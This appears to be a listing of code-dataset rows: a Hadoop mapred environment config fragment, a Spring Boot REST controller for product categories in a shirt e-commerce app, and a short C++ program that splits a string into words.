# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# export JAVA_HOME=/home/y/libexec/jdk1.6.0/
export HADOOP_JOB_HISTORYSERVER_HEAPSIZE=1000
export HADOOP_MAPRED_ROOT_LOGGER=INFO,RFA
#export HADOOP_JOB_HISTORYSERVER_OPTS=
#export HADOOP_MAPRED_LOG_DIR="" # Where log files are stored. $HADOOP_MAPRED_HOME/logs by default.
#export HADOOP_JHS_LOGGER=INFO,RFA # Hadoop JobSummary logger.
#export HADOOP_MAPRED_PID_DIR= # The pid files are stored. /tmp by default.
#export HADOOP_MAPRED_IDENT_STRING= #A string representing this instance of hadoop. $USER by default
#export HADOOP_MAPRED_NICENESS= #The scheduling priority for daemons. Defaults to 0.
#export _JAVA_OPTIONS="" |
<filename>shirt_ecommerce/src/main/java/com/sunil__parcha/Controllers/CategoryController.java
package com.sunil__parcha.Controllers;
import java.util.List;
import java.util.Optional;
import org.json.simple.JSONArray;
import org.json.simple.JSONObject;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RestController;
import com.sunil__parcha.Modals.Category;
import com.sunil__parcha.Service.CategoryService;
@RestController
public class CategoryController {
@Autowired
private CategoryService categoryService;
@GetMapping(value = "/categories")
public JSONObject CatoryGet() {
return categoryService.findDataById();
}
@GetMapping(value = "/categories/{id}")
private Optional<Category> getDepartmentById(@PathVariable("id") int id) {
return categoryService.findById(id);
}
@GetMapping(value = "/categories/inProduct/{id}")
private JSONArray getProductById(@PathVariable("id") int id) {
return categoryService.findProductById(id);
}
@GetMapping(value = "/categories/inDepartment/{id}")
private List<Category> getDepartmrntById(@PathVariable("id") int id) {
return categoryService.findDepartmentById(id);
}
}
|
#include <iostream>
#include <sstream>
#include <vector>
using namespace std;
// Function to split a string into words
vector<string> splitString(string str)
{
stringstream ss(str);
vector<string> words;
// Extracts words from string
string word;
while (ss >> word)
words.push_back(word);
// Returns vector of words extracted
return words;
}
// Driver Code
int main()
{
string inputString = "This is a sample string";
vector<string> words;
words = splitString(inputString);
// Print the vector
for(string word : words)
cout << word << " ";
return 0;
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.